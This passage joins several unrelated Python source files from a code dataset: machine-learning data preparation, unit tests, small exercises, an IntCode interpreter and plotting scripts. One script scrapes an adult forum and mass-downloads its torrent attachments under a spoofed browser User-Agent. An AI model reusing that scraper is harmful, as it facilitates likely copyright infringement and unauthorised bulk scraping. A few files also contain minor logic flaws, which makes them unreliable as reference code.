self.IDX_FMT.format(int(self.batch_size*self.n_angles*idx) + count)\n #if count%100==0:\n # print(str_id)\n #print(datum)\n\n # The encode is only essential in Python 3\n txn.put(str_id, datum.SerializeToString())\n txn_rot_ang.put(str_id, str(angle) )\n\n #Storing unroted images\n datum_unrot = caffe.io.array_to_datum(np.reshape(im.squeeze(),[1,28,28]).astype(float), label)\n txn_unrot.put(str_id, datum_unrot.SerializeToString()) \n \n #Storing unroted and corrupted images\n datum_unrot_uncorr = caffe.io.array_to_datum(np.reshape(X_uncrot_uncorr.squeeze(),[1,28,28]).astype(float), label)\n txn_unrot_corrupted.put(str_id, datum_unrot_uncorr.SerializeToString()) \n\n # Storing 
corrupted randints\n                                        txn_randint.put(str_id, str(randint))\n                                        count = count + 1\n                                        if int(self.batch_size*self.n_angles*idx + count) % 10000 == 0:\n                                            print('Image Nr. %i created from %s' % (int(self.batch_size*self.n_angles*idx + count), self.dir_str))\n            env_rot_ang.close()\n            env_unrot_corrupted.close()\n            env_unrot.close()\n            env_randint.close()\n            env_rot.close()\n\n        src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_lmdb'\n        dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_lmdb/shuffled'\n\n        if args:\n            import json\n            # a previously saved index list can be passed in as the first positional argument\n            with open(args[0]) as data_file:\n                ind = json.load(data_file)\n                ind = [int(i) for i in ind]\n        else:\n            ind = self.create_shuffled_ind(src_dir, dst_dir)\n\n        self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\n        src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_ang_lmdb'\n        dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'rot_ang_lmdb/shuffled'\n        self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\n        src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'unrot_lmdb'\n        dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'unrot_lmdb/shuffled'\n        self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\n        # NOTE: run() never creates an 'uncorrupt_lmdb' database, so shuffling it would fail\n        # src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'uncorrupt_lmdb/'\n        # dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'uncorrupt_lmdb/shuffled'\n        # self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\n        src_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'corrupted_unrot_lmdb/'\n        dst_dir = self.dst_lmdb_dir + 'MNIST' + set_st + 'corrupted_unrot_lmdb/shuffled'\n        self.shuffle_samples_lmdb(src_dir, dst_dir, ind)\n\nif __name__ == '__main__':\n    # MNISTcorrupter needs explicit settings before it can run, e.g.:\n    # corrupter = MNISTcorrupter(src_lmdb_dir, dst_lmdb_dir, N_im, batch_size, set_str, dir_str, angles, N_pix_corrupt)\n    # corrupter.run()\n    pass\n","sub_path":"CorruptMNIST.py","file_name":"CorruptMNIST.py","file_ext":"py","file_size_in_byte":10594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"430636541","text":"import unittest\nimport unittest.mock as mock\nimport re\n\nfrom node.ping import Ping\n\nPING_OK_EXAMPLE = 'PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\\n64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.037 ms\\n64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.020 ms\\n64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.066 ms\\n\\n--- 127.0.0.1 ping statistics ---\\n3 packets transmitted, 3 received, 0% packet loss, time 1998ms\\nrtt min/avg/max/mdev = 0.020/0.041/0.066/0.019 ms\\n'\nPING_KO_EXAMPLE = 'PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.\\n\\n--- 10.0.0.1 ping statistics ---\\n3 packets transmitted, 0 received, 100% packet loss, time 2016ms\\n\\n'\n\nclass TestPing(unittest.TestCase):\n\n    def setUp(self):\n        self.ping = Ping()\n\n    # def test_ping_command(self):\n    #     self.ping.ping_command(\"127.0.0.1\")\n\n    # def test_ping_command_failed(self):\n    #     print(self.ping.ping_command(\"10.0.0.1\"))\n\n    def test_get_ttl_and_time(self):\n        result = self.ping.get_ttl_and_time(PING_OK_EXAMPLE)\n        expected = ([64, 64, 64], [0.037, 0.020, 0.066])\n\n        self.assertEqual(result, expected)\n\n    def test_get_ttl_and_time_failed(self):\n        result = self.ping.get_ttl_and_time(PING_KO_EXAMPLE)\n        expected = ([], [])\n\n        self.assertEqual(result, expected)\n\n    def test_get_statistics(self):\n        result = self.ping.get_scan_statistics(PING_OK_EXAMPLE)\n        expected = (3, 3, 1998)\n        self.assertEqual(result, expected)\n\n    def test_call(self):\n        ping_command = mock.Mock(return_value=PING_OK_EXAMPLE)\n        parameters = {\"ip\":\"127.0.0.1\"}\n        result = self.ping(parameters, ping_command)\n        expected = {\n            'packet_transmitted': 3,\n            'packet_received': 3,\n            'scan_time': 1998,\n            'ttl': [64, 64, 64],\n            'time': [0.037, 0.02, 
0.066]\n }\n self.assertEqual(result, expected)\n\n\n \n","sub_path":"tests/test_ping.py","file_name":"test_ping.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"441858383","text":"from flask_testing import TestCase\nfrom app import app, db\n\nclass BaseTestCase(TestCase):\n\n def create_app(self):\n app.config.from_object('flask_config.TestsConfiguration')\n return app\n\n def setUp(self):\n db.create_all()\n self.db = db\n self.app_context = app.app_context()\n self.app_context.push()\n self.client = app.test_client()\n\n\n def tearDown(self):\n del self.client\n del self.db\n self.app_context.pop()\n db.session.remove()\n db.drop_all()","sub_path":"app/app_tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422816803","text":"import logging\n\n\ndef create_logger(script_name):\n logger = logging.getLogger(script_name)\n logger.setLevel(logging.DEBUG)\n log_path = script_name.replace('.py', '.log')\n segments = log_path.split('/')\n segments.insert(-1, '../log')\n log_path = '/'.join(segments)\n # create file handler\n fh = logging.FileHandler(log_path)\n fh.setLevel(logging.INFO)\n\n # create formatter\n fmt = \"%(asctime)-15s %(levelname)s %(filename)s %(lineno)d %(process)d %(message)s\"\n datefmt = \"%a %d %b %Y %H:%M:%S\"\n formatter = logging.Formatter(fmt, datefmt)\n\n # add handler and formatter to logger\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n return logger\n","sub_path":"utils/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518088631","text":"#Longest Substring Without Repeating Characters\nstr = input(\"Enter the string\\n\")\ndef findLongestSubstring(str) :\n #creating dictionary which will tract character and its index as key value pair\n dict = {}\n str_longest_Substring = \"\"\n str_check = \"\"\n i = 0\n while i < len(str) :\n #checking is character is presnt in our dictionary\n if str[i] in dict.keys() :\n i = dict[str[i]]\n dict.clear()\n str_check = \"\"\n else :\n dict[str[i]] = i\n str_check = str_check + str[i]\n if len(str_check) > len(str_longest_Substring) :\n str_longest_Substring = str_check \n i+=1\n print(str_longest_Substring)\nfindLongestSubstring(str)","sub_path":"String/longestPallindrome.py","file_name":"longestPallindrome.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15083676","text":"\"\"\"Script to skeletonize segments. 
Takes in two command line arguments:\n * Input filename: This must be a numpy .npy file\n * Output filename: This will be another .npy file\n\nUses scikit-image's skeletonize_3d function.\n\nWe assume that the segment ID that occurs most frequently in the volume belongs to\nthe segment that has the largest volume.\n\"\"\"\n\nimport sys\nimport numpy\nimport matplotlib.pyplot as plt\nfrom skimage.morphology import skeletonize_3d\n\nNUM_SEGS = 1  # Number of largest segments to skeletonize\nMEMBRANE_ID = 2081\n\ndef skeletonize_volume(in_file, out_file):\n    print(\"Loading segments from input file...\")\n    input_segments = numpy.load(in_file)\n    (zdim, ydim, xdim) = input_segments.shape\n    single_segment = numpy.zeros((zdim, ydim, xdim), dtype='uint8')  # Arrays to store results\n    skeletonized = numpy.zeros((zdim, ydim, xdim), dtype='uint8')\n    segments = numpy.zeros((zdim, ydim, xdim), dtype='uint8')\n    print(\"Getting most frequent segment IDs...\")\n    (seg_ids, counts) = numpy.unique(input_segments, return_counts=True)  # Get segment IDs and their counts\n    # Cell membrane is invariably one of the largest classes, so we keep one more \"segment\" than we'd like\n    sorted_count_indices = numpy.argpartition(counts, -(NUM_SEGS+1))[-(NUM_SEGS+1):]  # Indices (into seg_ids) of the NUM_SEGS+1 most frequent segments\n    largest_segs = seg_ids[sorted_count_indices]  # Get the seg IDs of those segments\n    descending_segs = largest_segs[numpy.argsort(-largest_segs)]  # Sort the candidate IDs in descending order (note: this orders by ID, not by voxel count)\n    count = 0\n    for idx in descending_segs:\n        if idx != MEMBRANE_ID:  # Skip cell membrane\n            count += 1\n            print(\"Skeletonizing segment ID \" + str(idx) + \", \" + str(count) + \" out of \" + str(NUM_SEGS) + \"...\")\n            single_segment = (input_segments == idx).astype('uint8')  # Convert to binary mask (vectorised; replaces a voxel-by-voxel triple loop)\n            single_segment_skeletonized = skeletonize_3d(single_segment)  # Skeletonize single segment\n            segments = numpy.add(segments, single_segment)  # Merge entire segments, not skeletonized\n            skeletonized = numpy.add(single_segment_skeletonized, skeletonized)  # Merge current segment skeleton with other segment skeletons\n            single_segment = numpy.zeros((zdim, ydim, xdim), dtype='uint8')  # Reinitialize single segment array\n            #plt.imshow(single_segment[12, :, :], cmap='gray')\n            #plt.show()\n    numpy.save(out_file, skeletonized)\n    numpy.save(\"full_segments.npy\", segments)  # Save full segments without skeletonization\n    #plt.imshow(skeletonized[12, :, :], cmap='gray')\n    #plt.show()\n\nif __name__ == '__main__':\n    if len(sys.argv) < 3:\n        raise RuntimeError(\"Usage: python skeletonize_segments.py <input_file.npy> <output_file.npy>\")\n\n    in_file = sys.argv[1]\n    out_file = sys.argv[2]\n\n    skeletonize_volume(in_file, out_file)\n","sub_path":"skeletonize/skeletonize_largest_segment.py","file_name":"skeletonize_largest_segment.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636340315","text":"#\r\n# Copyright 2016 Practical VR.\r\n# All rights reserved.\r\n\r\nimport queue\r\nimport threading\r\nfrom threading import Thread\r\n\r\nfrom common.logging import LOG\r\nfrom common.resources import data_queue\r\n\r\nclass EventDispatcherThread(Thread):\r\n\r\n    def __init__(self):\r\n        Thread.__init__(self)\r\n        self._queue = data_queue.DataQueue()\r\n        self._lock = threading.Lock()\r\n        LOG.debug(\"Event dispatcher initialized!\")\r\n\r\n    def add_event(self, 
event):\r\n \"\"\"\r\n Register an event\r\n :param event:\r\n :return:\r\n \"\"\"\r\n if self._queue is None:\r\n return\r\n\r\n # Queue the event...\r\n self._queue.enqueue(event)\r\n\r\n def run(self):\r\n if self._queue is None:\r\n LOG.error(\"event dispatcher was not properly initialized\")\r\n return\r\n\r\n while True:\r\n try:\r\n event = self._queue.dequeue(blocking=True)\r\n if event.isLastEvent():\r\n self._queue.task_done()\r\n break\r\n LOG.info (\"[[Dispatching event]]\" + str(event.get_type()))\r\n event.handle()\r\n self._queue.task_done()\r\n except queue.Empty:\r\n pass\r\n\r\n with self._lock:\r\n print(\"[[locking]]\")\r\n","sub_path":"common/resources/event_dispatcher.py","file_name":"event_dispatcher.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"107088063","text":"import sys\nimport os\nfrom workflow import Workflow\n\ndef main(wf):\n args = wf.args\n\n # parse the first arg\n op = args[0]\n\n if op == 'add':\n try:\n cur = args[1].lower()\n except:\n return wait(m=\"Please give a valid currency type\")\n\n if not is_valid_cur(cur):\n return wait(m=\"{0} isn't a valid currency type\".format(cur))\n\n iterator = [cur] if op == 'add' else wf.settings['defaults']['cur_types']\n\n for c in iterator:\n title = '{0} {1}'.format(op.capitalize(), c.upper())\n subtitle = 'Press enter to proceed'\n arg = '{0} {1}'.format(op, c)\n icon = './assets/flags/{0}.png'.format(c)\n\n wf.add_item(title=title, subtitle=subtitle, icon=icon, arg=arg, valid=True)\n\n wf.send_feedback()\n\ndef wait(m):\n wf.add_item(title=m)\n wf.send_feedback()\n\ndef is_valid_cur(cur):\n return cur in wf.settings['defaults']['rate']\n\nif __name__ == '__main__':\n wf = Workflow()\n sys.exit(wf.run(main))\n","sub_path":"manage_currency.py","file_name":"manage_currency.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"476337876","text":"# -*- coding: UTF-8 -*-\nimport os\n\ndef change_num_to_fill(file_path, zerofill):\n '''\n 将原始的文件名称由0,1,2,...,399变为00000,00001, ..., 00399,这种位数填充形式\n :param file_path: 文件路径\n :param zerofill: 填充位数\n :return:\n '''\n file_list = os.listdir(file_path)\n for file in file_list:\n old_filename = file_path + '/' + file\n file_name = file.split('.')[0]\n file_num = int(file_name)\n s = str(file_num)\n st = s.zfill(zerofill) # 这里的数字为名称的总数位,比如000000递增就是6\n new_filename = file_path + '/' + st + '.' + file.split('.')[-1]\n # 用os模块中的rename方法对文件改名\n os.rename(old_filename, new_filename)\n\ndef zip_convert(file_path, zerofill, begin_num):\n '''\n 把一个以数字类型命名的文件名称改成n位填充的命名方式\n :param file_path: 需要更改名称的文件路径\n :param begin_num: 开始编号,从此编号开始顺序改变名称\n :param zerofill: 填充位数\n :return: 在原始的文件夹内更改文件名\n '''\n file_list = os.listdir(file_path)\n for file in file_list:\n old_filename = file_path + '/' + file\n #设置新文件名\n #s = str(n + 1)\n s=str(begin_num)\n st=s.zfill(zerofill) #这里的数字为名称的总数位,比如000000递增就是6\n new_filename = file_path + '/' + st + '.' 
+ file.split('.')[-1]\n #用os模块中的rename方法对文件改名\n os.rename(old_filename, new_filename)\n begin_num += 1\n\nif __name__ == '__main__':\n file_path = r'F:\\post_graduate_design\\postgraduate_continue\\little_target_new\\labelled_data_jpg\\ragged'\n zerofill = 7\n begin_num = 0\n # change_num_to_fill(file_path, zerofill)\n zip_convert(file_path, zerofill + 1, begin_num)\n zip_convert(file_path, zerofill, begin_num)\n","sub_path":"image_operation/change_number.py","file_name":"change_number.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"540239246","text":"# download torrent files\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport time\nimport random\n\nheaders = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}\n\nfor id in range(1,500):\n # 143 亚洲成人无码原创区\n # 25 亚洲无码区\n # 230 亚洲成人有码原创区\n # 229 欧美成人无码原创区\n response = requests.get(f'http://www.sexinsex.net/bbs/forum-229-{id}.html', headers = headers)\n print(response)\n soup = BeautifulSoup(response.content, 'html.parser')\n ths = soup.find_all('th', class_='new')\n \n for th in ths:\n link = th.find('span').find('a')['href']\n print(link)\n link_response = requests.get(f'http://www.sexinsex.net/bbs/{link}', headers = headers)\n link_soup = BeautifulSoup(link_response.content, 'html.parser')\n attachment = link_soup.find('dl', class_='t_attachlist').find('a')['href']\n attachment_name = link_soup.find('dl', class_='t_attachlist').find('a').string\n response = requests.get(f'http://www.sexinsex.net/bbs/{attachment}', headers = headers)\n open(f\"D:/Media/torrent/{attachment_name}\", 'wb').write(response.content)\n","sub_path":"scrape images/sexinsex3 torrent.py","file_name":"sexinsex3 torrent.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98256227","text":"# The Factorial of a positive integer, n, is defined as the product of the sequence n, n-1, n-2, ...1 and the factorial of zero, 0, is defined as being 1. 
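For example, 5! = 5*4*3*2*1 = 120.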
Solve this using both loops and recursion.\n# recursion (base case x <= 1 so that 0! == 1, matching the definition above)\ndef factorial_rec(x):\n    if x <= 1:\n        return 1\n    else:\n        return x * factorial_rec(x - 1)\nprint(factorial_rec(5))\n# loops\ndef factorial(x):\n    result = 1\n    while x >= 1:\n        result = result * x\n        x = x - 1\n    return result\nprint(factorial(5))\n","sub_path":"Numbers/Factorial_Finder.py","file_name":"Factorial_Finder.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"230771299","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\n# General day 2 stuff\n\nclass IntCode(object):\n\n    INSTR_ZERO = set([99])\n    INSTR_ONE = set([3, 4, 9])\n    INSTR_TWO = set([5, 6])\n    INSTR_THREE = set([1, 2, 7, 8])\n\n    def __init__(self, size):\n        self.memory = [0] * size\n        self.relative_offset = 0\n        self.program_counter = 0\n        self.cycle_counter = 0\n        self.steps = -1\n\n    def instr_args(self, instr):\n        \"\"\"returns the number of arguments for a given instruction\"\"\"\n        if instr in IntCode.INSTR_ZERO:\n            return 0\n        elif instr in IntCode.INSTR_ONE:\n            return 1\n        elif instr in IntCode.INSTR_TWO:\n            return 2\n        elif instr in IntCode.INSTR_THREE:\n            return 3\n        else:\n            raise Exception(\"Illegal instruction: %s\" % str(instr))\n\n    def decode_modes(self, instr):\n        return ((instr // 10000) % 10,\n                (instr // 1000) % 10,\n                (instr // 100) % 10,\n                (instr % 100))\n\n    def exec(self):\n        pc = self.program_counter\n        pinstr = self.memory[pc]\n        # Not all modes may be applicable, they're fetched anyway.\n        mode2, mode1, mode0, instr = self.decode_modes(pinstr)\n        argc = self.instr_args(instr)\n        args = self.memory[pc + 1:pc + 1 + argc]\n\n        self.cycle_counter += 1\n        # Jumps reset this later.\n        self.program_counter += argc + 1\n        if instr == 1:\n            self.mem(args[2], mode2,\n                     val=self.mem(args[0], mode0) + self.mem(args[1], mode1))\n        elif instr == 2:\n            self.mem(args[2], mode2,\n                     val=self.mem(args[0], mode0) * self.mem(args[1], mode1))\n        elif instr == 3:\n            self.mem(args[0], mode0, val=int(input(\"\")))\n        elif instr == 4:\n            print(self.mem(args[0], mode0))\n        elif instr == 5:\n            if self.mem(args[0], mode0) != 0:\n                # we increment program counter later.\n                self.program_counter = self.mem(args[1], mode1)\n        elif instr == 6:\n            if self.mem(args[0], mode0) == 0:\n                # we increment program counter later.\n                self.program_counter = self.mem(args[1], mode1)\n        elif instr == 7:\n            self.mem(args[2], mode2,\n                     val=int(self.mem(args[0], mode0) < self.mem(args[1], mode1)))\n        elif instr == 8:\n            self.mem(args[2], mode2,\n                     val=int(self.mem(args[0], mode0) == self.mem(args[1], mode1)))\n        elif instr == 9:\n            self.relative_offset += self.mem(args[0], mode0)\n        elif instr == 99:\n            return \"exit\"\n        else:\n            raise Exception(\"invalid instruction: %s at index: %s\" % (str(instr), self.program_counter))\n        return None\n\n    def run(self):\n        out = None\n        while True:\n            if out == \"exit\" or self.steps == self.cycle_counter:\n                break\n            out = self.exec()\n        print(\"exiting...\")\n\n    def mem(self, arg, mode, *, val=None):\n        if mode not in [0, 1, 2]:\n            raise Exception(\"bad mode: %s\" % mode)\n        if val is not None:\n            # data write\n            if mode == 0:\n                self.memory[arg] = val\n            elif mode == 1:\n                raise Exception(\"illegal mode for write: %s\" % mode)\n            elif mode == 2:\n                self.memory[arg + self.relative_offset] = val\n        else:\n            if mode == 0:\n                return self.memory[arg]\n            elif mode == 1:\n                return arg\n            elif mode == 2:\n                return self.memory[arg + self.relative_offset]\n\n\ndef load(f):\n    contents = []\n    for line 
in f:\n contents.extend(line.split(','))\n return [ int(i) for i in contents ]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('input', type=argparse.FileType('r'), nargs='?', default=sys.stdin)\n parser.add_argument('--steps', default=None, type=int)\n\n args = parser.parse_args(sys.argv[1:])\n\n ic = IntCode(0)\n ic.steps = args.steps\n ic.memory = load(args.input) + [0] * 4096\n\n ic.run()\n\n print(\"cycles:\", ic.cycle_counter)\n print(\"first mem:\", ic.memory[0])\n\n","sub_path":"2019/day-09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6337764","text":"import math\n\nfrom keras.layers.core import Dense\nfrom keras.models import Sequential\n\nimport torch.nn.functional as F\nfrom torch import nn\n\n\ndef translate_honorific_title(train_df, test_df):\n #######################################\n # name => honorific title\n #######################################\n train_values = []\n test_values = []\n for i, val in enumerate(train_df['Name'].to_numpy()):\n title = val.split(',')[1].split('.')[0].strip()\n if title in ['Mr', 'Mrs', 'Miss', 'Master']:\n train_values.append(title)\n else:\n train_values.append('Other')\n for i, val in enumerate(test_df['Name'].to_numpy()):\n title = val.split(',')[1].split('.')[0].strip()\n if title in ['Mr', 'Mrs', 'Miss', 'Master']:\n test_values.append(title)\n else:\n test_values.append('Other')\n train_df['HonorificTitle'] = train_values\n test_df['HonorificTitle'] = test_values\n return train_df, test_df\n\n\ndef translate_age(train_df, test_df):\n #######################################\n # no age => mean grouped Mr, Mrs, Miss\n #######################################\n # get honorific title => age mean\n t2m = {}\n tmp = train_df.groupby('HonorificTitle')['Age']\n for key in tmp.indices.keys():\n t2m[key] = tmp.mean()[key]\n # age range\n for df in [train_df, test_df]:\n for i, val in enumerate(df['Age'].to_numpy()):\n if math.isnan(val):\n df['Age'].to_numpy()[i] = \\\n t2m[df['HonorificTitle'].to_numpy()[i]]\n return train_df, test_df\n\n\ndef translate_fare(train_df, test_df):\n #######################################\n # no fare => mean grouped by pclass\n #######################################\n for df in [train_df, test_df]:\n for i, val in enumerate(df['Fare'].to_numpy()):\n if math.isnan(val):\n df['Fare'].to_numpy()[i] = \\\n train_df.groupby('Pclass')['Fare'].mean()[\n df['Pclass'].to_numpy()[i]]\n return train_df, test_df\n\n\ndef translate_familystatus(train_df, test_df):\n #######################################\n # sibsp + parch == 0 => no family(0)\n # survive vs no survive in same familyname\n # => more survive(1) or less survive(2)\n # delete sibsp, parch\n # categorize after\n #######################################\n # get family name\n train_df['FamilyName'] = [''] * len(train_df['Name'].to_numpy())\n for i, val in enumerate(train_df['Name'].to_numpy()):\n train_df['FamilyName'].to_numpy()[i] = val.split(',')[0]\n # get family name => family status\n n2s = {}\n tmp = train_df.groupby('FamilyName')['Survived']\n for key in tmp.indices.keys():\n survived_num = tmp.sum()[key]\n no_survived_num = tmp.count()[key] - survived_num\n if survived_num > no_survived_num:\n n2s[key] = 1\n else:\n n2s[key] = 2\n # main\n for df in [train_df, test_df]:\n df['FamilyStatus'] = [0] * len(df['Name'].to_numpy())\n for i, val in enumerate(df['Name'].to_numpy()):\n 
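# the surname is everything before the comma in \"Surname, Title. Given\"\n            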
family_name = val.split(',')[0]\n # no family\n if df['SibSp'].to_numpy()[i] + df['Parch'].to_numpy()[i] == 0:\n continue\n # any family\n if family_name in n2s:\n df['FamilyStatus'].to_numpy()[i] = n2s[family_name]\n # del sibsp, parch\n del df['SibSp']\n del df['Parch']\n # del family name\n del train_df['FamilyName']\n return train_df, test_df\n\n\ndef _create_nn_model():\n input_dim = 7\n activation = 'relu'\n output_dim = 2\n optimizer = 'adam'\n\n model = Sequential()\n model.add(Dense(10, input_dim=input_dim, activation=activation))\n model.add(Dense(10, activation=activation))\n model.add(Dense(output_dim, activation=\"softmax\"))\n\n model.compile(\n loss='binary_crossentropy',\n optimizer=optimizer, metrics=['accuracy'])\n model.summary()\n return model\n\n\ndef create_nn_model():\n input_dim = 7\n\n class Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(input_dim, 270)\n self.fc2 = nn.Linear(270, 2)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.dropout(x, p=0.1)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.softmax(x, dim=-1)\n return x\n\n return Net\n","sub_path":"sklearn_wrapper/modules/myfuncs/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"565633110","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nTPdata1 = np.loadtxt('./1step/tp.txt')\nTPdata2 = np.loadtxt('./10step/tp.txt')\nTPdata3 = np.loadtxt('./100step/tp.txt')\n\n\nstep = TPdata1.shape[0]\nt = TPdata1[:, 0]\nT1 = TPdata1[:, 1]\nP1 = TPdata1[:, 3]\ntaverageT1 = TPdata1[:, 2]\ntaverageP1 = TPdata1[:, 4]\nT2 = TPdata2[:, 1]\nP2 = TPdata2[:, 3]\ntaverageT2 = TPdata2[:, 2]\ntaverageP2 = TPdata2[:, 4]\nT3 = TPdata3[:, 1]\nP3 = TPdata3[:, 3]\ntaverageT3 = TPdata3[:, 2]\ntaverageP3 = TPdata3[:, 4]\n\n\n################################ Temperature #################################\n\nplt.figure(figsize=(7, 5))\nplt.plot(t, taverageT1, label='1step')\nplt.plot(t, taverageT2, label='10step')\nplt.plot(t, taverageT3, label='100step')\nplt.xlim([0, 200])\n# plt.ylim([85, 115])\nplt.xlabel('Time')\nplt.ylabel('Temperature')\nplt.title('Time-averaged Temperature vs t')\nplt.legend(loc='lower right')\nplt.savefig('T&aT.png')\n\n\n################################ Temperature #################################\n\nplt.figure(figsize=(7, 5))\nplt.plot(t, taverageT1, label='1step')\nplt.plot(t, taverageT2, label='10step')\nplt.plot(t, taverageT3, label='100step')\nplt.xlim([0, 1])\nplt.ylim([80, 105])\nplt.xlabel('Time')\nplt.ylabel('Temperature')\nplt.title('Time-averaged Temperature vs t')\nplt.legend(loc='lower right')\nplt.savefig('T&aT_s.png')\n\n","sub_path":"Homework/Project/Velocity-rescaling/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205833851","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nimport json\nimport datetime\nfrom mpl_toolkits import mplot3d\nfrom datetime import datetime\n\n\n# this script groups attendance statuses and places them into one of three catergories\n# two graphs created showing attendance by day (incl. 
proportionalised)\n\n\nwith open('../../Datasets/Created:Modified/att_data_condensed.json', 'r') as fp:\n obj = json.load(fp)\n\n\ndf = pd.DataFrame(obj)\n\n\ndf.head(3)\n\n\npresent = {'Monday':0,'Tuesday':0,'Wednesday':0,'Thursday':0,'Friday':0,'Saturday':0,'Sunday':0}\nabsent = {'Monday':0,'Tuesday':0,'Wednesday':0,'Thursday':0,'Friday':0,'Saturday':0,'Sunday':0}\nother = {'Monday':0,'Tuesday':0,'Wednesday':0,'Thursday':0,'Friday':0,'Saturday':0,'Sunday':0}\n\n\nfor idx, x in enumerate(df['classDateTime']):\n tempDay = pd.Timestamp(x).day_name()\n tempStatus = df.loc[idx,'Status']\n if(tempStatus in ['P','PDG','PROJ','PRM']): \n present[tempDay] += 1\n elif(tempStatus in ['U','ABS','AA','PWR']): \n absent[tempDay] += 1\n else:\n other[tempDay] += 1\n \nprint(present)\n\n\nprint (present.get(\"Monday\",0))\n\n\n# y-axis in bold\nrc('font', weight='bold')\n \n# Values of each group\nbars1 = [present.get(\"Monday\",0),present.get(\"Tuesday\",0),present.get(\"Wednesday\",0),present.get(\"Thursday\",0),present.get(\"Friday\",0),present.get(\"Saturday\",0),present.get(\"Sunday\",0)]\nbars2 = [absent.get(\"Monday\",0),absent.get(\"Tuesday\",0),absent.get(\"Wednesday\",0),absent.get(\"Thursday\",0),absent.get(\"Friday\",0),absent.get(\"Saturday\",0),absent.get(\"Sunday\",0)]\nbars3 = [other.get(\"Monday\",0),other.get(\"Tuesday\",0),other.get(\"Wednesday\",0),other.get(\"Thursday\",0),other.get(\"Friday\",0),other.get(\"Saturday\",0),other.get(\"Sunday\",0)]\n\n# Heights of bars1 + bars2\nbars = np.add(bars1, bars2)\n \n# The position of the bars on the x-axis\nr = [0,1,2,3,4,5,6]\n \n# Names of group and bar width\nnames = ['Monday','Tuesday','Wednesday','Thursday','Friday', 'Saturday', 'Sunday']\n\nwidth = 10\nheight = 7\nplt.figure(figsize=(width, height))\n\nplt.bar(r, bars1,label=\"Present\")\nplt.bar(r, bars2, bottom=bars1,label=\"Absent\")\nplt.bar(r, bars3, bottom=bars,label=\"Other\")\n\n# Custom X axis\nplt.xticks(r, names, fontweight='bold')\nplt.xlabel(\"Week Day Attendance Status\")\nplt.legend()\n\n# Show graphic\nplt.show()\n\n\np = pd.DataFrame.from_dict(present,orient='index')\na = pd.DataFrame.from_dict(absent,orient='index')\no = pd.DataFrame.from_dict(other,orient='index')\n\n# Create the total score for each participant\ntotals = [i+j+k for i,j,k in zip(p[0], a[0], o[0])]\n\n# Create the percentage of the total score the pre_score value for each participant was\nbars1 = [i / j * 100 for i,j in zip(p[0], totals)]\n\n# Create the percentage of the total score the mid_score value for each participant was\nbars2 = [i / j * 100 for i,j in zip(a[0], totals)]\n\n# Create the percentage of the total score the post_score value for each participant was\nbars3 = [i / j * 100 for i,j in zip(o[0], totals)]\n\n\nrc('font', weight='bold')\n\n# Heights of bars1 